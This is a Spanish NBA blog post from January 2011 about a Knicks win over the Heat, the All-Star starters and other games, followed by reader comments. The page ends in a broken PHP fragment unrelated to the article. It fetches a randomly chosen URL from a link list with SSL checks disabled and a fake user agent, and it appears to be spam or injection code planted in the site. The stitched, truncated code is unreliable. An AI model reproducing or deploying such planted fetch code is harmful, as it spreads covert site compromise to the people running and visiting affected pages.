La Crónica (27/01/2011)

28 de January de 2011 por MagicJohnson32

galloamareLo nunca visto. Los Knicks, ese equipo divertido pero, digámoslo así, tan poroso a la hora de proteger su aro, tumbaron a los Heat a base de defensa. Defensa y triples, claro, pero lo sorprendente es lo primero. Tras irse al último cuarto 9 puntos por detrás, los NYK echaron el cerrojo y lograron un parcial 8-0 que dejó el marcador en un pañuelo. Los Heat intentaron sobrevivir con algunos tiros libres y penetraciones de LeBron pero pagaron un terrible último cuarto de Wade, que falló sus siete tiros de campo y 3 de sus 4 tiros libres después de unos tres primeros cuartos espectaculares. Dos triples de Gallinari y otros dos de Fields obraron el milagro y dieron a los de la Gran Manzana una alegría, la segunda del día tras conocer que Amare Stoudemire será el primer knickerbocker titular en un All-Star desde principios de los 90.

Amaré formará con Rose, Wade, LeBron y Dwight Howard, como no podía ser de otra manera, mientras que en el Oeste han sido elegidos como titulares Kobe Bryant (que ha sido el más votado y que se queda a una selección del récord compartido por Jerry West, Karl Malone y Shaquille O’Neal), Chris Paul, Carmelo Anthony, Kevin Durant y… Yao. Queda ahora en manos del Comisionado Stern la decisión de quién sustituirá al pívot de los Rockets en el partido de las estrellas. A Pau Gasol se le abre así una puerta más que interesante, ya que Stern puede saltarse la consideración de ‘forward’ que tiene Gasol y concederle el puesto de pívot titular.

Volviendo a la crónica, también hubo su dosis de emoción en el duelo texano entre Rockets y Mavs, y eso que el primer cuarto apuntaba a paseo de los de Cuban. Y si uno no se espera que los Knicks se pongan a defender como perros de prensa, menos aún anticipábamos que Tyson Chandler se iba a marcar dos partidos consecutivos anotando 21puntos, en los que ha logrado además 22 de 23 tiros libres. Sin duda está en uno de sus mejores momentos, y lo refrendó anoche con 15 rebotes. Casualmente, acaba contrato este año. Quien quiera sospechar, está invitado. La cosa es que perkmientras Dirk continúa recuperando la forma, a los Mavs le está viniendo muy bien el despertar de Chandler, fundamental en las tres victorias consecutivas que suman tras vencer a unos Rockets en los que Kevin Martin y Luis Scola apenas contaron con ayuda de Hayes y poco más. A propósito… ¿para qué ficharían los Rockets a Terrence Williams?

La jornada se cerró en Portland, donde unos Blazers machacados por las lesiones se vieron asfixiados por la defensa de los Celtics. Los de Boston celebran el regreso de Perkins, que está rindiendo magníficamente desde el primer momento y anoche ya aportó 10 puntos y 9 rebotes. LaMarcus cumplió con su parte y se fue a 17 puntos y 16 rebotes, y Rudy firmó un partido de escaso acierto en el tiro pero completo con 11 puntos, 5 asistencias, 3 rebotes y 3 robos. Pero entre la lesión de Batum, que pinta fea, y los terribles porcentajes en el tiro, los Blazers poco pudieron hacer. Los Celtics apenas necesitaron de un rendimiento correcto de su cuarteto estelar, con KG al filo del triple doble, para anotarse el triunfo.

tychandPREMIOS

MVP: Dudamos entre otorgárselo a los 24 puntos, 8 rebotes, 4 asistencias y 2 robos de Amaré Stoudamire o los 21 puntos (5 de 8) y 15 rebotes de Tyson Chandler. Ambos vencieron en partidos a cara de perro.

Rookie: Venía pasando una mala racha pero Landry Fields apareció en el momento más oportuno. 19 puntos, 13 rebotes y 6 asistencias para el mayor robo del draft en muchos años.

Sorpresa: JJ Barea la vuelve a liar. 19 puntos con 8 de 10 en tiros. ¿Empezamos a creer en él o no?

Decepción: Echar un ojo al banquillo de los Heat da penita. 5 de los 6 jugadores que participaron se quedaron sin anotar. El único que aportó algo fue Joel Anthony.

Esfuerzo en vano: Los Knicks exprimieron al máximo a Dwyane Wade que se fue a los 34 puntos, 16 rebots y 5 asistencias, y casi  todo en los tres primeros cuartos. Le exprimieron y además le dejaron sin victoria.

Imágenes | AP / Getty Images

Comenta

11 comentarios a esta entrada

  1. Vader dice:
    #1

    Vamos Knicks!!! 🙂

    Creo que es el entrenador del Oeste quien decidira el pivot titular. Stern solo decide quien ocupa la plaza de All-Star que Yao deia vacante.

    Saludos!!!

      Citar

  2. MagicJohnson32 dice:
    #2

    Sí, claro, tienes razón, el jugador que saldrá de inicio es cosa del coach. Quería decir que Stern no tiene que elegir necesariamente a un pívot. Aunque si eligen a Pau, supongo que Popo saldría con él como titular ¿no?

    Por cierto, no lo he comentado pero Rose es el primer jugador de los Bulls titular en un All-Star desde Jordan.

      Citar

  3. Denise dice:
    #3

    Ya no es noticia que los Heat pierdan sin alguno del Bg Three jugando.
    Yo siempre creí en Barea, y Beaubouis es otro pedazo de jugador, veremos si vuelve a buen nivel tras sul lesión.

      Citar

  4. Busky23 dice:
    #4

    Es curioso ver como no hay ningún titular del All-Star ni del líder del Oeste (San Antonio),ni del líder del Este (Boston),será porque juegan en equipo ;)?
    Espero que Stern tenga en cuenta a Pau para substituir a Yao,seria surrealista ver a Bynum de titular mientras Gasol calienta banquillo.
    Entre Pau y Duncan estará el substituto.
    Muy moderno Wade con sus gafas,…menos mal que tenía migraña…

      Citar

  5. Scriers dice:
    #5

    Yo también creo en Barea, es un base que si le dijeran que tiene que pasar, pasaría, y si le dicen de anotar, anota. Además, me cae muy bien porque es muy humilde y sabe de su privilegio. lo malo es que es flojito en defensa, me recuerda en eso a Calderón. Y luego, pues beaubois me parece mejor, mas talentoso.
    Los Heats estän en modo serrucho, o mucho, o poco.
    y Ojmayo ha dado positivo, vaya temporadita del de Memphis. A mì me parece un muy buen jugador, pero le puede pasar como a darius miles y similares…

      Citar

  6. Denise dice:
    #6

    La verdad es que sale muy barato doparse, solo 10 partidos, como a Rashard Lewis en su día.
    Como deben de estar de arrepentidos en Memphis por haber traspasado a Kevin Love por este energumeno que o se dopa, o se tira mandarinas o se pelea en aviones….

      Citar

  7. Scriers dice:
    #7

    Energumeno…? Joé, cualquiera comete errores contigo Denise :p

      Citar

  8. GreenPride dice:
    #8

    Antes de nada un comentario sobre los titulares del All-Star. Como se dice por ahí los 2 mejores equipos en lo que va de competicion no tienen ningún titular. ¿El juego de equipo no se valora por los aficionados? Puede ser aunque si repasamos las temporadas individuales de sus jugadores es difícil quitar a alguien de los 5 iniciales (excepto Yao claro) para poner a alguno de estos equipos, lo que no quita para reconocer que Celtics y Spurs hasta ahora son los que mejor juegan a esto que no dejará nunca de ser un juego de equipo.
    De ayer vi Knicks-Heat y Blazers-Celtics. En los Heat ya queda claro que si no está alguno de su trío mágico el equipo no puede ganar a los rivales complicados y eso que Wade estuvo fenomenal en los 3 primeros cuartos. Se dejaron comer la tostada al final cuando a los Knicks que no metían una les empezaron a entrar los triples. Muy bien Stat de nuevo en los de New York y en general el equipo se ve que cree en lo que hace con mucha gente joven. Daran guerra.
    Por su parte los Celtics ganaron a base de saber estar, veteranía y defensa a un mermado equipo de Portland. Antes de nada una estadística que dió la TNT durante el partido. Pierce lleva su mejor año como profesional en porcentaje de tiros de 2, 3 y libres y Ray Allen su mejor año como profesional en porcentaje de tiros de 2 y de 3, ¿Alguien dijo viejos? ¿Alguien dijo juego de equipo que les hace tirar mejor y no chuparselas en posiciones difíciles? Sin duda esa es la clave de estos Celtics que además parecen recuperar a Perkins en buen estado. Veremos a ver en los 2 próximos partidos en Phoenix y LA contra los Lakers donde necesitarán algo de más acierto cara al aro si quieren ganar. Portland demasiado hace con competir. Rudy lo intenta pero no le acaban de salir mucho las cosas. Su mayor problema fue que no supieron cómo atacar a Boston y que Aldridge las pasó canutas para anotar ante Garnett.

      Citar

  9. Denise dice:
    #9

    Es mi forma de hablar quizás, tal vez tu solo utilizas esta palabra en su sentido estricto, yo la utilizo en muchos sentidos, yo es que suelo utilizar para hablar un lenguaje que si lo ves escrito sin apreciar el tono en que lo digo pues puede parecer agresivo y fuerte, pero no es así, por ejemplo, yo no saludo a un amigo con un “hola que tal?” sino con un por ejemplo “que pasa puto?” o nos llamamos H.P. unos a otros así en tono informal.
    Bueno cuidaré mi vocabulario-jerga de aqui en adelante.

    Yo pienso que Boston tiene mejor equipo que el año pasado y que incluso el año en que derrotó a los Lakers en 2008.

      Citar

  10. TheDeerHunter dice:
    #10

    ¿Infravalorados los dos mejores equipos de la regular??
    Es bastante posible que Boston lleve a 4 y Spurs a 3.

    Pero seamos realistas… quitando a Rondo por un lado frente a Rose y a Parker frente a CP3 ¿alguno de ellos puede realmente discutir los puestos individualmente??
    Ha hecho mejor año Garnett que Stat? ¿ Allen que Wade?? Pierce que LeBron? ¿Ginobili que Kobe? o ¿Duncan que el resto de sus compañeros de posición?
    Ni de coña, vamos.

    Y los más discutibles que son Rondo y Parker tampoco. Hablo como titulares.

    Yo creo que terminarán yendo esos 7 y que se lo merecen. Seguramente por eso son los mejores.
    Pero en ningún caso de inicio.

      Citar

  11. Scriers dice:
    #11

    Denise, era una broma compadre, no te enfades, no soy tan sibarita 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>